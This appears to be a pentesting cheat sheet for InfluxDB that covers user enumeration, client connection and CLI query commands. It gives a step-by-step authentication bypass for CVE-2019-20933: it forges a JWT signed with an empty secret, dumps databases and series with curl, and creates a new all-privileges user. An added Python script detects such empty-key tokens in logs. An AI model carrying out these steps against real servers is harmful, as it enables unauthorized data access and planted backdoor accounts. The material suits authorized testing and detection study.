InfluxDB Pentesting

InfluxDB is a time series database written in Go. The default port is 8086.

- https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933

Enumeration

# User enumeration
curl http://<target-ip>:8086/debug/requests


Connect

influx -host 10.0.0.1 -port 8086
influx -host 10.0.0.1 -port 8086 -database <database>
influx -host 10.0.0.1 -port 8086 -username <username> -password <password>

# Import db file
influx -path example.db


Authentication Bypass (CVE-2019-20933) version ≤ 1.7.6

Automation

https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933

Manual

Reference: https://www.komodosec.com/post/when-all-else-fails-find-a-0-day

First, find the username.

curl http://<target-ip>:8086/debug/requests

Then create a JWT on jwt.io using the username we found.
The parameters are below:

Header:

{ "sub": "123456789", "alg": "HS256", "typ": "JWT" }

Payload:

{ "username": "<username>", "exp": 21548669066 }

Verify Signature:

HMACSHA256(base64UrlEncode(header) + "." + base64UrlEncode(payload), <empty>)

Copy the generated JWT.
Now we can query the InfluxDB API.

INFLUXDB_JWT="<JWT>"
# List databases
curl http://<target-ip>:8086/query -H "Authorization: Bearer $INFLUXDB_JWT" --data-urlencode 'q=SHOW DATABASES' | jq
# List series in the database
curl http://<target-ip>:8086/query -H "Authorization: Bearer $INFLUXDB_JWT" --data-urlencode 'db=<database>' --data-urlencode 'q=SHOW SERIES' | jq
# Get values in the series
curl http://<target-ip>:8086/query -H "Authorization: Bearer $INFLUXDB_JWT" --data-urlencode 'db=<database>' --data-urlencode 'q=SELECT * FROM <series>' | jq

# Create a privileged account
curl http://<target-ip>:8086/query -H "Authorization: Bearer $INFLUXDB_JWT" --data-urlencode "q=CREATE USER tester with PASSWORD 'password' with ALL PRIVILEGES"
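
Detection side of the empty-secret signature described above, as an added example (not code from the original page or from InfluxDB): it scans log lines that record Authorization headers and flags any HS256 JWT whose signature verifies under a zero-length key. The function names and the log source (a reverse proxy or capture that keeps the header) are assumptions.

```python
import base64
import hashlib
import hmac
import json
import re
import sys

# Compact JWT: three base64url segments separated by dots.
BEARER_RE = re.compile(r"Bearer\s+([A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]*)")


def _b64url(segment):
    """Decode an unpadded base64url segment."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def empty_secret_jwt(token):
    """Return the claims if token is an HS256 JWT whose signature verifies
    under a zero-length key, otherwise None."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    try:
        header = json.loads(_b64url(parts[0]))
        claims = json.loads(_b64url(parts[1]))
        signature = _b64url(parts[2])
    except ValueError:  # bad base64, bad UTF-8 or bad JSON
        return None
    if not (isinstance(header, dict) and isinstance(claims, dict)):
        return None
    if header.get("alg") != "HS256":
        return None
    signing_input = (parts[0] + "." + parts[1]).encode("ascii")
    expected = hmac.new(b"", signing_input, hashlib.sha256).digest()
    return claims if hmac.compare_digest(signature, expected) else None


def scan_log(lines):
    """Return (line_number, claimed username) for each empty-key token."""
    hits = []
    for number, line in enumerate(lines, 1):
        for token in BEARER_RE.findall(line):
            claims = empty_secret_jwt(token)
            if claims is not None:
                hits.append((number, claims.get("username")))
    return hits


if __name__ == "__main__":
    # Assumed usage: python3 scan.py < access.log (log must keep the header)
    for number, user in scan_log(sys.stdin):
        print(f"line {number}: JWT signed with empty key, username={user!r}")
```

A hit means the token would only be accepted by a server that has no shared secret configured, so the claimed username shows which account was being impersonated.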


Commands

# Show command history
> history
# Show settings
> settings

# List databases
> show databases
# Show series information
> show series
# Show measurement information
> show measurements
# Show tag key information
> show tag keys
# Show field key information
> show field keys

# Switch to the database
> use <database>
# Query in the database
> select * from <series>